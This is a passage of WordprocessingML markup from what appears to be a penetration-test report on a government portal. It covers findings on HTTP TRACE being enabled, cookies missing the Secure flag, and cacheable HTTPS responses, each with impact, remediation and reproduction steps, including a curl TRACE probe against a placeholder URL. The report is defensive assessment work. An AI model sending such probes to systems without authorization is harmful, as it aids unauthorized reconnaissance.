    <w:p w14:paraId="7B8F22CC" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>For other web servers or load balancers, consult their respective documentation to disable these methods. It is crucial to ensure that any intermediary proxies or load balancers also strip or block TRACE/TRACK requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D36D4C9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8DF36A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Open a terminal or command prompt. 2. Send an HTTP TRACE request to the target URL using a tool like curl:    curl -v -X TRACE http://[target-gov-portal-url]/ 3. Observe the server's response. If the TRACE method is enabled, the server will reflect the entire request back in the response body, including any headers sent (e.g., Cookie headers). 4. An HTTP 200 OK response with the request headers echoed in the response body confirms </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>the vulnerability</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. If TRACE is disabled, a 405 Method Not Allowed or similar error is expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC025E4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597A6362" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cwe.mitre.org/data/definitions/776.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47439259" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_HTTP_Verb_Tampering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065241D1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://portswigger.net/web-security/cross-site-scripting/cross-site-tracing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB3AE78" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3438E645"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28DAC833"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05E6B325" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Missing Secure Flag for Cookies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D97706"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E735041" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>MEDIUM CVSS 5.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C3F064B"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6184467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8E16D2C"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B2609A1" w14:textId="090682DA"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-011</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D4C1465"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AB7354A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5.4 (Medium)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="54A63E5B"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A90940F"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78CBFD8"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DA88461"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04EB5EF3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-614</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="0675996C"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8B31E1A"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A967448"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58F7C7C5"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4B7B3B3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="124C3F8F"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88B6AF8"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93A8C6"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6BE975D"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8C17FAF" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="2CA80FBA"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22F0268"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07BFEC3"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FE95469"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5580441" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46700B71" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5373C2B8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Cookies set by the application for the 'gov portal' domain do not have the 'Secure' flag enabled. The 'Secure' flag ensures that a cookie is only sent to the server with an encrypted request over the HTTPS protocol. Without this flag, cookies can be transmitted over unencrypted HTTP connections if a user accesses the site via HTTP or if the site redirects from HTTP to HTTPS but sends the cookie prematurely. This can expose sensitive cookie contents, such as session IDs or authentication tokens, to passive network eavesdropping by an attacker. Attackers capable of performing a Man-in-the-Middle (MITM) attack could intercept these cookies, potentially leading to session hijacking or unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B01F06D" w14:textId="47AFFD74" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3471486F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The absence of the 'Secure' flag on cookies poses a significant risk to user data confidentiality and account integrity for the government portal. Without proper protection, sensitive session information could be intercepted by malicious actors, leading to unauthorized access to government systems and confidential data. This directly violates the 'Protect' function of the NIST Cybersecurity Framework, specifically related to data security and access control. Such a breach could result in severe financial repercussions due to data breach response costs, legal fees, and potential regulatory fines for non-compliance with data protection standards. Furthermore, it could severely damage the public's trust in the government's ability to protect their information, leading to reputational harm and decreased public engagement with critical government services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F4A50F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6D2F60" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>STRATEGIC FIX (Architecture):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BF6AB0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Review the application's overall cookie management strategy to ensure all sensitive or session-related cookies are configured with the 'Secure' flag. Implement a robust Secure Software Development Lifecycle (SSDLC) that includes security reviews and automated checks for cookie attributes before deployment. Establish a policy requiring all production traffic to be exclusively served over HTTPS, with no fallback or initial connections over HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416CC298" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04722733" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TACTICAL FIX (Code Implementation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A568B2C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ensure that the 'Secure' flag is set for all cookies that contain sensitive information or are used for session management. This can typically be achieved by modifying the server-side code or web server configuration that issues the cookies. For example, in most web frameworks, there is an option to specify the 'Secure' attribute when setting a cookie. Verify that all HTTP to HTTPS redirects </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> handled securely and do not expose cookies over unencrypted channels during the redirection process. Example for setting a cookie with the Secure flag in a Set-Cookie header: Set-Cookie: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sessionid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">=abcdef12345; Path=/; Secure; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SameSite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=Lax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5525E0F0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29333BBE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1. Open a web browser and navigate to the target gov portal application. 2. Log in with valid credentials. 3. Open the browser's developer tools (e.g., F12 in Chrome/Firefox). 4. Navigate to the 'Network' tab and observe the HTTP requests and responses. 5. Inspect the 'Set-Cookie' headers in the HTTP responses, particularly for cookies related to session management or authentication. 6. Verify that these cookies are being set without the 'Secure' attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D87B8B9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC65CBC" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html#secure-attribute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E075BC" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cwe.mitre.org/data/definitions/614.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C11742D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://www.nist.gov/cyberframework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A2DC1C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E2D805" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:before="4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769"/>
        <w:gridCol w:w="2257"/>
      </w:tblGrid>
      <w:tr w:rsidR="009B7CCA" w14:paraId="288DA514" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3750" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="16A34A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1785F3FD" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Cacheable HTTPS Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="16A34A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08EDDEEB" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>LOW CVSS 2.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D02C396" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:before="100"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>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000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1352"/>
        <w:gridCol w:w="3156"/>
        <w:gridCol w:w="1352"/>
        <w:gridCol w:w="3156"/>
      </w:tblGrid>
      <w:tr w:rsidR="009B7CCA" w14:paraId="23F62724"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E162ABB" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Finding ID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3722E96" w14:textId="1AAB7924" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VSPS</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-014</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E72047D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS Rating</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4722FAA3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="16A34A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2.9 (Low)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="23349161"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5486772" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Category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5B55250" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A05:2021-Security Misconfiguration</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08238EFF" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE</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7318E7F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-524</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="626138E2"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32B9F7A7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Assets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35E8B1A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>N/A</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7D0B1838" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Status</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2DAD09E4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="07463146"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46D013C3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Priority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3792FBA1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium-term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1CCC1686" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Verified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5C88CDA6" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="3D14D178" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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2ADD0759" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Complexity</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7C6FAEA8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
